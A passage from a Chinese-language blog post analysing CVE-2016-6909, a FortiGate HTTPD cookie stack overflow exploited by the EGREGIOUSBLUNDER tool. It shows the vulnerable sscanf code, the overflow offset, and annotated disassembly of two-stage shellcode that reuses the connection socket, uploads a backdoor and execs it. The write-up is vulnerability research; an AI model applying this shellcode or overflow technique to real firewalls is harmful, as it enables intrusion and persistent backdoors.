<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><h3 id="定位漏洞位置"><a href="#定位漏洞位置" class="headerlink" title="定位漏洞位置"></a>定位漏洞位置</h3><p>查看httpsd的PID，然后GDB attach到第二个httpsd进程上，定位漏洞时，开始想在EGREGIOUSBLUNDER参数中使用的那个栈地址设置观察点，结果没有断下来。无奈只好自己构造发送给防火墙和POST数据包，将shellcode部分修改为无意义的数据，造成异常而中断下来。</p>
<p>最后会发现在函数<code>sub_820CB5E()</code>返回时（0x0820CEFB）产生了异常，再在此处下断，并使用EGREGIOUSBLUNDER，这次ret后就来到了栈上的shellcode中，也就说明了当前函数存在栈溢出。<br><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823144940.jpg" alt></p>
<blockquote>
<p><strong>Tip:</strong> 写这篇文章与分析的时间相隔了一年，只找到了几张图片，而且调试环境的建立也挺麻烦的，所以这里就没有贴太多调试过程的图片了。</p>
</blockquote>
<h3 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h3><p>经过调试可知，该函数用解析cookie，经过整理的IDA反编译结果如下。</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">int</span> __<span class="hljs-function">cdecl <span class="hljs-title">decode_cookie</span><span class="hljs-params">(<span class="hljs-keyword">char</span> *a1)</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">	<span class="hljs-comment">//...</span></span><br><span class="line">    <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> Era; <span class="hljs-comment">// [esp+38h] [ebp-11A0h]</span></span><br><span class="line">    <span class="hljs-keyword">char</span> Payload; <span class="hljs-comment">// [esp+14Ch] [ebp-108Ch]</span></span><br><span class="line">    <span class="hljs-keyword">char</span> AuthHash; <span class="hljs-comment">// [esp+116Ch] [ebp-6Ch]		//AuthHash位于ebp下108字节</span></span><br><span class="line">	<span class="hljs-comment">//...</span></span><br><span class="line">    </span><br><span class="line">    size = <span class="hljs-number">1</span>;</span><br><span class="line">    <span class="hljs-keyword">if</span> ( a1 )</span><br><span class="line">		size = <span class="hljs-built_in">strlen</span>(a1) + <span class="hljs-number">1</span>;</span><br><span class="line">    src = <span class="hljs-number">0</span>;</span><br><span class="line">    <span class="hljs-built_in">memset</span>(&amp;AuthHash, <span class="hljs-number">0</span>, <span class="hljs-number">0x52</span>u);		<span class="hljs-comment">//</span></span><br><span class="line">    v16 = <span class="hljs-number">20</span>;</span><br><span class="line">    <span class="hljs-built_in">memset</span>(&amp;Payload, <span class="hljs-number">0</span>, <span class="hljs-number">0x1000</span>u);		<span class="hljs-comment">//</span></span><br><span class="line">    ptr = <span class="hljs-number">0</span>;</span><br><span class="line">    v7 = <span class="hljs-number">-1</span>;</span><br><span class="line">    <span class="hljs-keyword">if</span> ( a1 )</span><br><span class="line">	&#123;</span><br><span class="line">		sub_820C6F0();</span><br><span class="line">    	<span class="hljs-keyword">if</span> ( <span class="hljs-built_in">sscanf</span>(a1, <span class="hljs-string">"Era=%1d&amp;Payload=%[^&amp;]&amp;AuthHash=%s"</span>, &amp;Era, &amp;Payload, &amp;AuthHash) == <span class="hljs-number">3</span> )</span><br><span class="line">    	&#123;</span><br><span class="line">	<span class="hljs-comment">//...</span></span><br></pre></td></tr></table></figure>

<p>该函数在调用<code>sscanf()</code>将Cookie中<strong>Era</strong>、<strong>Payload</strong>和<strong>AuthHash</strong>三个值放进三个变量，却没有检查传入的AuthHash和Payload字符串大小，从而导致了缓冲区溢出。本例中，AuthHash位于ebp下108字节，EGREGIOUSBLUNDER构造了一个116字节的AuthHash，正好覆盖ebp和返回地址。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823145017.jpg" alt></p>
<h2 id="shellcode分析"><a href="#shellcode分析" class="headerlink" title="shellcode分析"></a>shellcode分析</h2><p>Linus Torvalds在他的自传<em>Just for fun</em>中谈过Unix“小即是美”的理念，几乎所有事情都由6个基本的系统调用完成（fork、execve、open、write、read和close），个人觉得EGREGIOUSBLUNDER所使用的shellcode就能完美诠释这个理念，它分为两大部分，分别通过变量AuthHash和Payload布置到内存中，并且使用了大量<code>int 80</code>系统调用，将后门nopen程序上传到防火墙并执行。</p>
<h3 id="第一段shellcode"><a href="#第一段shellcode" class="headerlink" title="第一段shellcode"></a>第一段shellcode</h3><p>因为栈溢出的空间太小，栈上没有足够的位置放置全部shellcode，所以这段shellcode的目的只是为了定位到已经被分配在堆上的第二段shellcode。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">nop</span><br><span class="line">nop</span><br><span class="line">nop</span><br><span class="line">mov     ebp, esp</span><br><span class="line">pop     ebx</span><br><span class="line">pop     ecx             ; pop useless parameter</span><br><span class="line">pop     ecx             ; pop useless parameter</span><br><span class="line">pop     eax             ; 指向整个Cookie值的指针</span><br><span class="line">add     eax, 0Eh        ; 指向Cookie中Payload字段值的指针</span><br><span class="line">jmp     eax             ; 转跳到堆中的第二段shellcode(decoding处)</span><br></pre></td></tr></table></figure>

<h3 id="第二段shellcode"><a href="#第二段shellcode" class="headerlink" title="第二段shellcode"></a>第二段shellcode</h3><p>第二段shellcode在前面提到<code>decode_cookie()</code>函数执行前就已经被放入了一块动态分配的内存中，并且指向该内存的指针作为一个参数传入了<code>decode_cookie()</code>，再通过第一段shellcode转跳过来。其功能是将配置文件<code>EGBL.config</code>中指定的后门上传到防火墙上，并通过<code>execve</code>系统调用替换当前的httpsd进程。</p>
<p>shellcode的首要任务就是定位自己在内存中的位置，即确定EIP指针的当前值，第二段shellcode的开始部分就是做这项工作，具体可以参考<em>Shellcoder’s Programming Uncovered</em>的10.3节。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sub_A56D165：</span><br><span class="line">	pop ecx</span><br><span class="line">	jmp ecx</span><br><span class="line"></span><br><span class="line">decoding:</span><br><span class="line">    call    sub_A56D165</span><br><span class="line">;...</span><br></pre></td></tr></table></figure>

<p>接着就是一段解码自身的指令。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">;...</span><br><span class="line">	push    eax</span><br><span class="line">    push    ecx</span><br><span class="line">    push    edx</span><br><span class="line">    push    ebx</span><br><span class="line">    push    esp</span><br><span class="line">    push    ebp</span><br><span class="line">    push    esi</span><br><span class="line">    push    edi</span><br><span class="line">    push    ecx</span><br><span class="line">    pop     ecx</span><br><span class="line">    push    77h ; &apos;w&apos;</span><br><span class="line">    inc     edi</span><br><span class="line">    pop     eax</span><br><span class="line">    xor     al, 77h</span><br><span class="line">;...</span><br></pre></td></tr></table></figure>

<p>解码完成后，首先通过<code>getpeername</code>系统调用从0xFF向下遍历可用套接字</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">after_decode:</span><br><span class="line">    xor     ebx, ebx</span><br><span class="line">    mov     edi, esp</span><br><span class="line">    lea     esi, [edi+10h]</span><br><span class="line">    mov     [edi+4], esi</span><br><span class="line">    lea     ecx, [edi+20h]</span><br><span class="line">    mov     [edi+8], ecx</span><br><span class="line">    mov     bl, 10h</span><br><span class="line">    mov     [ecx], ebx</span><br><span class="line">    xor     ecx, ecx</span><br><span class="line">    mov     cl, 0FFh</span><br><span class="line">getpeername:</span><br><span class="line">    mov     [edi], ecx</span><br><span class="line">    push    ecx             ; socket fd</span><br><span class="line">    xor     eax, eax</span><br><span class="line">    mov     al, 66h</span><br><span class="line">    mov     bl, 7</span><br><span class="line">    mov     ecx, edi</span><br><span class="line">    int     80h             ; LINUX - sys_getpeername</span><br><span class="line">    pop     ecx             ; fd</span><br><span class="line">    xor     ebx, ebx</span><br><span class="line">    cmp     eax, ebx</span><br><span class="line">loc_A56D23D:           </span><br><span class="line">    jnz     short loc_A56D249</span><br><span class="line">    mov     ax, 5C11h</span><br><span class="line">loc_A56D243:           </span><br><span class="line">    cmp     [esi+2], ax</span><br><span class="line">    jz      short loc_A56D24B</span><br><span class="line">loc_A56D249:           </span><br><span class="line">    loop    getpeername</span><br><span class="line">loc_A56D24B:           </span><br><span class="line">    mov     ebx, ecx        ; socket fd</span><br><span class="line">    xor     ecx, ecx</span><br><span class="line">loc_A56D24F:           </span><br><span class="line">    mov     cl, 3</span><br></pre></td></tr></table></figure>

<p>找到可用套接字后，将文件描述符0、1、2重定向到socket。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">sys_dup2:              </span><br><span class="line">    xor     eax, eax</span><br><span class="line">    mov     al, 3Fh</span><br><span class="line">    dec     ecx</span><br><span class="line">    int     80h             ; LINUX - sys_dup2</span><br><span class="line">    inc     ecx</span><br><span class="line">    loop    sys_dup2</span><br><span class="line">    mov     ebp, esp</span><br><span class="line">    sub     esp, 420h</span><br><span class="line">    mov     [ebp-4], ebx</span><br><span class="line">    xor     eax, eax</span><br><span class="line">    mov     [ebp-8], eax</span><br><span class="line">    sub     eax, 1</span><br><span class="line">    mov     [ebp-0Ch], eax</span><br><span class="line">    mov     [ebp-10h], esp</span><br><span class="line">    sub     esp, 10h</span><br><span class="line">    mov     [ebp-424h], esp</span><br><span class="line">    jmp     short write</span><br></pre></td></tr></table></figure>

<p>使用<code>wirte</code>系统调用发送确认ack1，其中包含了当前ebp的的信息，攻击程序收到该ACK确认消息后，会根据ebp-64h计算出实际的溢出地址作为提示消息。若发送的地址和收到的地址不同还会弹出警告。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">sys_write:</span><br><span class="line">    mov     eax, [ecx+0Ch]</span><br><span class="line">    xor     eax, 0C0EDBABEh</span><br><span class="line">    mov     [ecx+8], eax</span><br><span class="line">    mov     eax, [ecx+14h]</span><br><span class="line">    xor     eax, ebp        </span><br><span class="line">    mov     [ecx+10h], eax</span><br><span class="line">    mov     edx, 25h</span><br><span class="line">    push    edx             ; len</span><br><span class="line">    push    ecx             ; buffer 0xa56d2ae</span><br><span class="line">    mov     ebx, [ebp-4]</span><br><span class="line">    push    ebx             ; socket fd 0x6</span><br><span class="line">    mov     eax, 4</span><br><span class="line">    int     80h             ; LINUX - sys_write</span><br><span class="line">    jmp     short sys_read</span><br></pre></td></tr></table></figure>

<p>然后通过<code>read</code>接收发送的后门文件长度、文件头等信息。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">sys_read:</span><br><span class="line">    mov     edx, 25h ; &apos;%&apos;</span><br><span class="line">    push    edx             ; len</span><br><span class="line">    mov     ecx, [ebp-10h]</span><br><span class="line">    push    ecx             ; buffer</span><br><span class="line">    mov     ebx, [ebp-4]    ; socket fd 0x6</span><br><span class="line">    push    ebx</span><br><span class="line">    mov     eax, 3</span><br><span class="line">    int     80h             ; LINUX - sys_read</span><br><span class="line">    cmp     eax, 25h ; &apos;%&apos;</span><br><span class="line">    jnz     loc_A56D40C</span><br><span class="line">    mov     eax, [ebp-10h]</span><br><span class="line">    mov     ebx, [eax+8]</span><br><span class="line">    mov     ecx, [eax+0Ch]</span><br><span class="line">    xor     ebx, ecx        ; filesize</span><br><span class="line">    mov     [ebp-8], ebx</span><br><span class="line">    mov     esi, [ebp-10h]</span><br><span class="line">    add     esi, 18h</span><br><span class="line">    mov     edi, [ebp-424h]</span><br><span class="line">    mov     ecx, 8</span><br><span class="line">    rep movsb</span><br><span class="line">    xor     eax, eax</span><br><span class="line">    mov     [ebp-428h], eax</span><br><span class="line">    jmp     open</span><br></pre></td></tr></table></figure>

<p>上述步骤完成后，用<code>open</code>系统调用在防火墙上打开一个文件，并且再次使用<code>read</code>接收后门文件。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">sys_open:</span><br><span class="line">    mov     edx, 1C0h       ; mode(-rwx------)</span><br><span class="line">    push    edx</span><br><span class="line">    mov     ecx, 241h</span><br><span class="line">    push    ecx             ; flags</span><br><span class="line">    push    ebx             ; filename</span><br><span class="line">    mov     eax, 5</span><br><span class="line">    int     80h             ; LINUX - sys_open</span><br><span class="line">    mov     [ebp-0Ch], eax  ; nopen fd</span><br><span class="line">    xor     eax, eax</span><br><span class="line">    mov     [ebp-1Ch], eax</span><br></pre></td></tr></table></figure>

<p>再次通过<code>write</code>将接收到的后门文件数据写入刚才打开的文件中。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">sys_write2:</span><br><span class="line">    inc     edi</span><br><span class="line">    loop    loc_A56D368</span><br><span class="line">    mov     [ebp-428h], edx</span><br><span class="line">    mov     edx, [ebp-14h]  ; len</span><br><span class="line">    push    edx</span><br><span class="line">    mov     ecx, [ebp-10h]  ; addr</span><br><span class="line">    push    ecx</span><br><span class="line">    mov     ebx, [ebp-0Ch]  ; backdoor fd</span><br><span class="line">    push    ebx</span><br><span class="line">    mov     eax, 4</span><br><span class="line">    int     80h             ; LINUX - sys_write</span><br><span class="line">    mov     ecx, [ebp-1Ch]</span><br><span class="line">    add     ecx, eax</span><br><span class="line">    mov     [ebp-1Ch], ecx</span><br><span class="line">    mov     ecx, [ebp-8]</span><br><span class="line">    sub     ecx, eax</span><br><span class="line">    mov     [ebp-8], ecx</span><br><span class="line">    jcxz    loc_A56D3B2     ; loop until the file write complete</span><br><span class="line">    jmp     short sys_read2</span><br></pre></td></tr></table></figure>

<p>文件接收并写入完成后，关闭文件，并且发送第二个确认字符ack2，确认上传后门文件的完整性。</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">sys_write3:</span><br><span class="line">    mov     eax, [ecx+0Ch]</span><br><span class="line">    mov     ebx, [ebp-1Ch]  ; filesize</span><br><span class="line">    xor     eax, ebx</span><br><span class="line">    mov     [ecx+8], eax</span><br><span class="line">    mov     edx, 25h ; &apos;%&apos;  ; len</span><br><span class="line">    push    edx</span><br><span class="line">    push    ecx</span><br><span class="line">    mov     ebx, [ebp-4]    ; socket fd</span><br><span class="line">    push    ebx</span><br><span class="line">    mov     eax, 4</span><br><span class="line">    int     80h             ; LINUX - sys_write</span><br><span class="line">    jmp     short loc_A56D40C</span><br></pre></td></tr></table></figure>

<p>最后调用<code>execve</code>，将当前httpsd进程替换为后门程序</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">sys_execve: </span><br><span class="line">    push    eax</span><br><span class="line">    push    edi</span><br><span class="line">    mov     edx, esp</span><br><span class="line">    push    eax</span><br><span class="line">    push    esi</span><br><span class="line">    mov     ecx, esp</span><br><span class="line">    push    edx             ; envp</span><br><span class="line">    push    ecx             ; argv</span><br><span class="line">    push    ebx             ; path</span><br><span class="line">    mov     eax, 0Bh</span><br><span class="line">    int     80h             ; LINUX - sys_execve</span><br></pre></td></tr></table></figure>

<blockquote>
<p><strong>Tip:</strong> 要从EGREGIOUSBLUNDER中直接提取shellcode可能有些困难，所以可以在GDB调试时，等待shellcode自解码完成后dump出指定位置内存放入IDA中分析。另外以上过程省略了一些细节，有兴趣的读者可以自己试试。</p>
</blockquote>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>算起来这应该是笔者分析的第一个二进制漏洞吧，虽然只是一个经典的栈溢出，且目标没有ASLR、NX、Canary等漏洞缓解机制，但当时分析的时候还是感觉很过瘾。特别植入后门的工程化和专业化都很让人着迷，所以在此和大家一同分享，当然因为是第一次分析二进制漏洞，而且时间过去太久，如果文中有任何错误和疏漏欢迎在留言中指出☺。</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p><a href="https://help.fortinet.com/fos50hlp/54/Content/FortiOS/fortigate-WAN-opt-54/config_examples.htm" target="_blank" rel="noopener">FortiGate Configuration examples</a><br><a href="https://en.wikipedia.org/wiki/Tar_(computing)#UStar_format" target="_blank" rel="noopener">tar formart (wikipedia)</a><br><a href="http://tcpack.blogspot.com/2016/05/fortigate-cli-hacking-its-short.html" target="_blank" rel="noopener">FortiGate CLI HACKING</a><br><em>Shellcoder’s Programming Uncovered</em>（《shellcoder编程揭秘 》【美】Kris Kaspersky著）</p>

        </div>
        <!-- 文章结尾添加版权声明 从这里开始 -->
        
        <ul class="post-copyright">
        <li><strong>本文标题：</strong><a href="https://jontsang.github.io/post/d4ec6e34.html">CVE-2016-6909——Fortigate防火墙HTTPD栈溢出漏洞</a></li>
        <li><strong>本文作者：</strong><a href="https://jontsang.github.io">Jon Tsang</a></li>
        <!-- <li><strong>本文链接：</strong><a href="https://jontsang.github.io/post/d4ec6e34.html">https://jontsang.github.io/post/d4ec6e34.html</a></li> -->
        <li><strong>发布时间：</strong>2017-11-12</li>
        <li><strong>版权声明：</strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！</li>
        </ul>
        
        <!-- 文章结尾添加版权声明 到这里结束 -->
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/Fortigate/">Fortigate</a>, <a class="has-link-grey -link" href="/tags/Linux/">Linux</a>, <a class="has-link-grey -link" href="/tags/漏洞/">漏洞</a>, <a class="has-link-grey -link" href="/tags/网络设备/">网络设备</a>, <a class="has-link-grey -link" href="/tags/防火墙/">防火墙</a>
                </div>
            </div>
        </div>
        
        
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3>
        <div class="buttons is-centered">
            
                
<a class="button is-info donate">
    <span class="icon is-small">
        <i class="fab fa-alipay"></i>
    </span>
    <span>支付宝</span>
    <div class="qrcode"><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822175230.jpg" alt="支付宝"></div>
</a>

                
                
<a class="button is-success donate">
    <span class="icon is-small">
        <i class="fab fa-weixin"></i>
    </span>
    <span>微信</span>
    <div class="qrcode"><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822175230.jpg" alt="微信"></div>
</a>

                
        </div>
    </div>
</div>



<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/post/40555.html">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">CVE-2018-16509——Ghostscript沙箱逃逸漏洞</span>
            </a>
        </div>
        
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">评论</h3>
        
<div id="valine-thread" class="content"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#valine-thread' ,
        notify: true,
        verify: false,
        app_id: '2oTcdkk2ubE6P9DwKwwTTlDK-gzGzoHsz',
        app_key: 'z1TMyiu5W0zvLI3qKElhM6uU',
        placeholder: '不用注册也可以评论哟~支持Markdown~'
    });
</script>

    </div>
</div>
</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left is-sticky">
    
        
<div class="card widget" id="toc">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                目录
            </h3>
            <ul class="menu-list"><li>
        <a class="is-flex" href="#TL-DR">
        <span class="has-mr-6">1</span>
        <span>TL;DR</span>
        </a></li><li>
        <a class="is-flex" href="#环境搭建和工具介绍">
        <span class="has-mr-6">2</span>
        <span>环境搭建和工具介绍</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#Fortigate防火墙配置">
        <span class="has-mr-6">2.1</span>
        <span>Fortigate防火墙配置</span>
        </a></li><li>
        <a class="is-flex" href="#EGREGIOUSBLUNDER工具使用">
        <span class="has-mr-6">2.2</span>
        <span>EGREGIOUSBLUNDER工具使用</span>
        </a></li><li>
        <a class="is-flex" href="#防火墙Web管理界面登录流程">
        <span class="has-mr-6">2.3</span>
        <span>防火墙Web管理界面登录流程</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#文件系统和启动流程分析">
        <span class="has-mr-6">3</span>
        <span>文件系统和启动流程分析</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#获取vmdk硬盘中的文件系统">
        <span class="has-mr-6">3.1</span>
        <span>获取vmdk硬盘中的文件系统</span>
        </a></li><li>
        <a class="is-flex" href="#初始化程序init分析">
        <span class="has-mr-6">3.2</span>
        <span>初始化程序init分析</span>
        </a></li><li>
        <a class="is-flex" href="#启动过程分析">
        <span class="has-mr-6">3.3</span>
        <span>启动过程分析</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#建立动态调试环境">
        <span class="has-mr-6">4</span>
        <span>建立动态调试环境</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#编译GDB">
        <span class="has-mr-6">4.1</span>
        <span>编译GDB</span>
        </a></li><li>
        <a class="is-flex" href="#将GDB放入防火墙文件系统">
        <span class="has-mr-6">4.2</span>
        <span>将GDB放入防火墙文件系统</span>
        </a></li><li>
        <a class="is-flex" href="#获取反向shell">
        <span class="has-mr-6">4.3</span>
        <span>获取反向shell</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#漏洞分析">
        <span class="has-mr-6">5</span>
        <span>漏洞分析</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#定位漏洞位置">
        <span class="has-mr-6">5.1</span>
        <span>定位漏洞位置</span>
        </a></li><li>
        <a class="is-flex" href="#漏洞成因">
        <span class="has-mr-6">5.2</span>
        <span>漏洞成因</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#shellcode分析">
        <span class="has-mr-6">6</span>
        <span>shellcode分析</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#第一段shellcode">
        <span class="has-mr-6">6.1</span>
        <span>第一段shellcode</span>
        </a></li><li>
        <a class="is-flex" href="#第二段shellcode">
        <span class="has-mr-6">6.2</span>
        <span>第二段shellcode</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#总结">
        <span class="has-mr-6">7</span>
        <span>总结</span>
        </a></li><li>
        <a class="is-flex" href="#参考资料">
        <span class="has-mr-6">8</span>
        <span>参考资料</span>
        </a></li></ul>
        </div>
    </div>
</div>

    
    
        <div class="column-right-shadow is-hidden-widescreen is-sticky">
        
        </div>
    
</div>

                
            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/logo.svg" alt="CVE-2016-6909——Fortigate防火墙HTTPD栈溢出漏洞" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2019 Jon Tsang&nbsp;
                <!--Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>-->
                
                <br>
                <span id="busuanzi_container_site_uv">
                共<span id="busuanzi_value_site_uv">0</span>个访客
                </span>
                
                </p>
            </div>
            <div class="level-end">
            
                <div class="field has-addons is-flex-center-mobile has-mt-5-mobile is-flex-wrap is-flex-middle">
                
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Creative Commons" href="https://creativecommons.org/">
                        
                        <i class="fab fa-creative-commons"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/">
                        
                        <i class="fab fa-creative-commons-by"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                </p>
                
                </div>
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>

<script>
var IcarusThemeSettings = {
    article: {
        highlight: {
            clipboard: true,
            fold: 'unfolded'
        }
    }
};
</script>


    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script>



    
    
    
    <script src="/js/animation.js"></script>
    

    
    
    
    <script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
    <script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
    <script src="/js/gallery.js" defer></script>
    

    
    

<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
